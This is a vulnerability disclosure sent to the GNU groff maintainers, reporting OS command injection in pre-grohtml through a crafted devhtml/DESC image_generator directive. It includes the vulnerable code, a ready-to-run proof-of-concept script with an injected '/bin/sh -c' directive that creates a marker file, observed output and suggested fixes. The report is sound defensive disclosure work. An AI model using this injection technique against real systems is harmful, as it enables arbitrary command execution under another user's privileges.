[BUG] GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml image_generator handling via crafted devhtml/DESC

wheat MAX Wed, 10 Jun 2026 05:37:10 -0700

Hello maintainers, we have discovered an injection bug in the new version
of groff.


# GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml image_generator handling via crafted devhtml/DESC

## Summary

- **CWE**: CWE-78 (Improper Neutralization of Special Elements used in an
OS Command / OS Command Injection)
- **Vendor**: GNU Project
- **Product**: GNU groff (`pre-grohtml` / `groff -Thtml` pipeline)
- **Affected Version(s)**: GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e` (tested as GNU groff 1.24.0)
- **Affected Component(s)**:
  - `src/preproc/html/pre-html.cpp`, `get_image_generator()` — reads the
`image_generator` directive from the `devhtml/DESC` device description
selected through the groff font/device search path.
  - `src/preproc/html/pre-html.cpp`, `imageList::createPage()` — inserts
the `image_generator` string directly into a shell command string.
  - `src/preproc/html/pre-html.cpp`, `html_system()` — executes the
constructed command string with `system()`.
- **Attack Type / Vector**: Local — via a crafted groff font/device
directory supplied with `-F`, containing a malicious `devhtml/DESC`
`image_generator` directive, when `groff -Thtml` processes input that
triggers image generation.
- **Impact**: Arbitrary command execution with the privileges of the user
running `groff -Thtml`.

This report is independent from the companion GNU groff `eqn` CWE-121
report. They affect different groff components and different attack
surfaces: this issue is command injection in the HTML preprocessing
pipeline, while the companion report is a stack-based buffer overflow in
the `eqn` parser.

---

## Technical Details / Root Cause

In GNU groff, the HTML output pipeline uses `pre-grohtml` to prepare input
for HTML formatting and to generate images for content such as equations.
`pre-grohtml` reads device-description files from the groff font/device
search path. The normal `groff -F <font-directory>` option can select an
alternate font/device directory, including an alternate `devhtml/DESC` file.

The vulnerability is in the interaction between the `image_generator`
directive in `devhtml/DESC` and shell command construction in `pre-grohtml`:

1. **Attacker-controlled device directive is read from the selected font
path**: `get_image_generator()` opens `devhtml/DESC` through
`font_path.open_file()`, then returns the text after the `image_generator`
keyword without shell escaping, validation, or restriction:
   ```cpp
   static char *get_image_generator(void)
   {
     char *pathp;
     FILE *f;
     char *generator = 0 /* nullptr */;
     const char keyword[] = "image_generator";
     const size_t keyword_len = strlen(keyword);
     f = font_path.open_file(devhtml_desc, &pathp);
     if (0 /* nullptr */ == f)
       fatal("cannot open file '%1': %2", devhtml_desc, strerror(errno));
     int lineno = 0;
     while (get_line(f, pathp, lineno++)) {
       char *cursor = linebuf;
       size_t limit = strlen(linebuf);
       char *end = linebuf + limit;
       if (0 == (strncmp(linebuf, keyword, keyword_len))) {
         cursor += keyword_len;
         // At least one space or tab is required.
         if(!(' ' == *cursor) || ('\t' == *cursor))
           continue;
         cursor++;
         while((cursor < end) && ((' ' == *cursor) || ('\t' == *cursor)))
           cursor++;
         if (cursor == end)
           continue;
         generator = cursor;
       }
       ...
     }
     free(pathp);
     fclose(f);
     return generator;
   }
   ```

2. **The directive is stored as the global image generator command**:
During startup, `main()` copies the returned string into `image_gen`:
   ```cpp
   image_gen = strsave(get_image_generator());
   if (0 /* nullptr */ == image_gen)
     fatal("'image_generator' directive not found in file '%1'",
           devhtml_desc);
   ```
   At this point, a crafted `devhtml/DESC` can make `image_gen` contain
shell syntax such as `/bin/sh -c 'touch /tmp/marker' #`.

3. **The directive is concatenated into a shell command**: When HTML output
requires image generation, `imageList::createPage()` constructs a command
string and places `image_gen` at the beginning of the command:
   ```cpp
   int imageList::createPage(int pageno)
   {
     ...
     const char *s = make_string("ps2ps -sPageList=%d %s %s",
                                 pageno, psFileName, psPageName);
     html_system(s, 1);
     assert(strlen(image_gen) > 0);
     s = make_string("echo showpage | "
                     "%s%s -q -dBATCH -dSAFER "
                     "-dDEVICEHEIGHTPOINTS=792 "
                     "-dDEVICEWIDTHPOINTS=%d -dFIXEDMEDIA=true "
                     "-sDEVICE=%s -r%d %s "
                     "-sOutputFile=%s %s -",
                     image_gen,
                     EXE_EXT,
                     (getMaxX(pageno) * image_res) / postscriptRes,
                     image_device,
                     image_res,
                     antiAlias,
                     imagePageName,
                     psPageName);
     html_system(s, 1);
     free(const_cast<char *>(s));
     ...
   }
   ```

4. **The constructed string is executed by the shell**: `html_system()`
passes the constructed command string to `system()`:
   ```cpp
   static void html_system(const char *s, int redirect_stdout)
   {
     ...
     int status = system(s);
     ...
   }
   ```
   `system()` invokes `/bin/sh -c`, so the shell interprets any
metacharacters and shell syntax contained in `image_generator`. A trailing
`#` in the malicious directive comments out the rest of the command
appended by `pre-grohtml`.

No neutralization occurs anywhere on this path. The `image_generator` value
is selected from an attacker-controlled device-description file,
concatenated into a shell command, and executed with `system()`.
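
To make the effect of the trailing `#` concrete, the following is a minimal sketch, not groff code. `build_command()` and `shell_visible_part()` are hypothetical helpers; the format string is the one quoted from `createPage()`, while the width, device, resolution, and file names are placeholder values chosen for illustration. `shell_visible_part()` is a deliberately simplified model of shell comment handling that tracks only single quotes.

```cpp
#include <cassert>
#include <cstdio>
#include <string>

// Hypothetical helper: formats the command the way createPage() does,
// using fixed placeholder values for everything except image_gen.
std::string build_command(const std::string &image_gen)
{
  assert(!image_gen.empty());
  char buf[1024];
  std::snprintf(buf, sizeof buf,
                "echo showpage | "
                "%s%s -q -dBATCH -dSAFER "
                "-dDEVICEHEIGHTPOINTS=792 "
                "-dDEVICEWIDTHPOINTS=%d -dFIXEDMEDIA=true "
                "-sDEVICE=%s -r%d %s "
                "-sOutputFile=%s %s -",
                image_gen.c_str(), "" /* EXE_EXT placeholder */,
                612, "pnmraw", 100, "" /* antiAlias placeholder */,
                "/tmp/page.pnm", "/tmp/page.ps");
  return buf;
}

// Simplified model (assumption): a '#' that starts a word outside single
// quotes begins a comment, so the shell ignores the rest of the line.
std::string shell_visible_part(const std::string &cmd)
{
  bool in_single_quotes = false;
  for (std::size_t i = 0; i < cmd.size(); ++i) {
    char c = cmd[i];
    if (c == '\'')
      in_single_quotes = !in_single_quotes;
    else if (c == '#' && !in_single_quotes
             && (i == 0 || cmd[i - 1] == ' ' || cmd[i - 1] == '\t'))
      return cmd.substr(0, i);
  }
  return cmd;
}
```

Under this model, `shell_visible_part(build_command("/bin/sh -c 'touch /tmp/marker' #"))` keeps only the `echo showpage | /bin/sh -c 'touch /tmp/marker' ` prefix, whereas a benign value such as `gs` leaves the whole Ghostscript command intact.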

---

## Reproduction (PoC)

The command injection is reproducible on the default upstream build of GNU
groff on Linux. The PoC below creates a valid alternate font/device
directory by copying the stock `devhtml` and `devps` device descriptions,
then changes only the `image_generator` directive.

```sh
cd ~/groff_master
rm -rf /tmp/groff_font_cwe78 /tmp/groff_prehtml_cwe78_master
mkdir -p /tmp/groff_font_cwe78/devhtml /tmp/groff_font_cwe78/devps

# Preserve valid device descriptions and modify only image_generator.
cp font/devhtml/DESC /tmp/groff_font_cwe78/devhtml/DESC
cp font/devps/DESC /tmp/groff_font_cwe78/devps/DESC
python3 - <<'PY'
p = '/tmp/groff_font_cwe78/devhtml/DESC'
lines = open(p).read().splitlines()
out = []
for line in lines:
    if line.startswith('image_generator'):
        out.append("image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #")
    else:
        out.append(line)
open(p, 'w').write('\n'.join(out) + '\n')
PY

# Use an equation to trigger HTML image generation.
cat > /tmp/eqn_image_cwe78.roff <<'R'
.EQ
a over b
.EN
R

./test-groff -F /tmp/groff_font_cwe78 -e -Thtml /tmp/eqn_image_cwe78.roff \
  >/tmp/groff_html_master.out 2>/tmp/groff_html_master.err

echo "exit=$?"
ls -l /tmp/groff_prehtml_cwe78_master
sed -n '1,8p' /tmp/groff_html_master.err
```

The PoC relies on two small inputs: the alternate font/device directory and
a roff document. The relevant modified line in
`/tmp/groff_font_cwe78/devhtml/DESC` is:

```text
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
```

The input document `/tmp/eqn_image_cwe78.roff` is intentionally minimal;
its only purpose is to trigger HTML image generation:

```roff
.EQ
a over b
.EN
```

Observed result on Ubuntu 24.04 (`gcc 13.3.0`, default `./bootstrap &&
./configure && make`), using GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e`:

```text
GNU groff version 1.24.0
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
master exit=0
MASTER_MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:22 /tmp/groff_prehtml_cwe78_master
pamcut: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pnmcrop: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pnmtopng: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pre-grohtml: command 'pamcut 115 3 9 29 < /tmp/groff-page-0AmDwB | pnmcrop
-quiet| pnmtopng -quiet -background rgb:f/f/f -transparent rgb:f/f/f>
grohtml-2210740-2.png' returned status 1
```

The marker file `/tmp/groff_prehtml_cwe78_master` is created by the command
embedded in `devhtml/DESC`. This confirms that the injected command is
actually executed by the stock compiled binary. The later
`pamcut`/`pnmcrop`/`pnmtopng` diagnostics occur only because the PoC
replaces the expected Ghostscript program with a marker-file command, so no
image is produced; they are not required for command execution.

A final verification run after report formatting used a fresh marker file
and reproduced the same command execution:

```text
groff -F malicious -e -Thtml exit=0
MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:29 /tmp/reverify_cwe78_marker
```

---

## Fix / Mitigation

Avoid executing a shell command constructed from a device-description
string. The `image_generator` directive should be treated as an executable
path or command name, not as shell syntax.
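
One way to enforce the "executable path or command name" reading is to reject any directive value that is not a plain name. The sketch below is illustrative only: `is_plain_program_name()` is a hypothetical helper, and the allowed character set is an assumption, not something groff defines.

```cpp
#include <cctype>
#include <cstring>
#include <string>

// Hypothetical check: accept only a non-empty name made of letters,
// digits, and "_./+-" that does not start with '-'. Whitespace, quotes,
// '#', '|', ';', '$' and other shell syntax are all rejected.
bool is_plain_program_name(const std::string &s)
{
  if (s.empty() || s[0] == '-')
    return false;
  for (unsigned char c : s) {
    bool allowed = std::isalnum(c)
                   || (c != '\0' && std::strchr("_./+-", c) != nullptr);
    if (!allowed)
      return false;
  }
  return true;
}
```

With this check, `gs` and `/usr/bin/gs` pass, while the PoC value `/bin/sh -c 'touch /tmp/marker' #` is refused. The check does not stop a `DESC` file from naming an arbitrary existing executable, so it complements rather than replaces restrictions on untrusted font directories.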

**Recommended fix**: Replace the `system()` call with a direct `fork()` +
`execvp()` style invocation of the image generator using an `argv` array.
This ensures that the image-generator path and its arguments are passed as
separate arguments and cannot be interpreted as shell commands.
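
A minimal sketch of such an invocation on a POSIX system follows. `run_argv()` is a hypothetical helper, not an existing groff function, and it omits what a real patch would also need, such as feeding `showpage` to the child's standard input through a pipe and retrying `waitpid()` on `EINTR`.

```cpp
#include <cassert>
#include <string>
#include <vector>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Hypothetical helper: run args[0] with the given arguments, no shell.
// Returns the child's exit status, 127 if exec failed, or -1 on error.
int run_argv(const std::vector<std::string> &args)
{
  assert(!args.empty());
  // Build the argv array before forking so the child does no allocation.
  std::vector<char *> argv;
  for (const std::string &a : args)
    argv.push_back(const_cast<char *>(a.c_str()));
  argv.push_back(nullptr);

  pid_t pid = fork();
  if (pid < 0)
    return -1;
  if (pid == 0) {
    // Child: each element reaches the program as one literal argument.
    execvp(argv[0], argv.data());
    _exit(127); // reached only if exec failed
  }
  int status = 0;
  if (waitpid(pid, &status, 0) < 0)
    return -1;
  return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

If the PoC directive were passed as the program name, for example `run_argv({"/bin/sh -c 'touch /tmp/marker' #", "-q"})`, `execvp()` would look for a file with that literal name, fail, and the helper would return 127 without running `touch`.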

If configurable arguments are required, parse them with a shell-free
tokenizer and pass each token as a separate `argv` element. Do not pass the
resulting string through `/bin/sh -c`.
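
As an illustration of a shell-free tokenizer, the sketch below splits a directive value on spaces and tabs only. `split_words()` is a hypothetical helper; whether groff would want quoting or escaping rules on top of this is left open.

```cpp
#include <string>
#include <vector>

// Hypothetical tokenizer: split on spaces and tabs only. Quotes, '#',
// '|', ';' and '$' get no special meaning; they stay ordinary characters
// inside whichever token they appear in.
std::vector<std::string> split_words(const std::string &line)
{
  std::vector<std::string> words;
  std::string current;
  for (char c : line) {
    if (c == ' ' || c == '\t') {
      if (!current.empty()) {
        words.push_back(current);
        current.clear();
      }
    } else {
      current += c;
    }
  }
  if (!current.empty())
    words.push_back(current);
  return words;
}
```

For the PoC value `/bin/sh -c 'touch /tmp/marker' #`, this yields the five literal tokens `/bin/sh`, `-c`, `'touch`, `/tmp/marker'`, and `#`; the quotes and the `#` no longer group words or start a comment. Tokenizing removes shell interpretation only: the first token still selects which program runs, so the trust placed in the `DESC` file remains relevant.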

### Recommended Mitigations

- **Preferred**: Replace `system()` in the image-generation path with a
shell-free process invocation (`fork()` + `execvp()` or equivalent).
- If patching is not immediately possible:
  - Do not run `groff -Thtml` with untrusted `-F` font/device directories.
  - Do not allow untrusted users to supply `devhtml/DESC` files.
  - Pin groff's font/device path to a trusted directory and sandbox the
formatter when processing untrusted input.

Thank you.
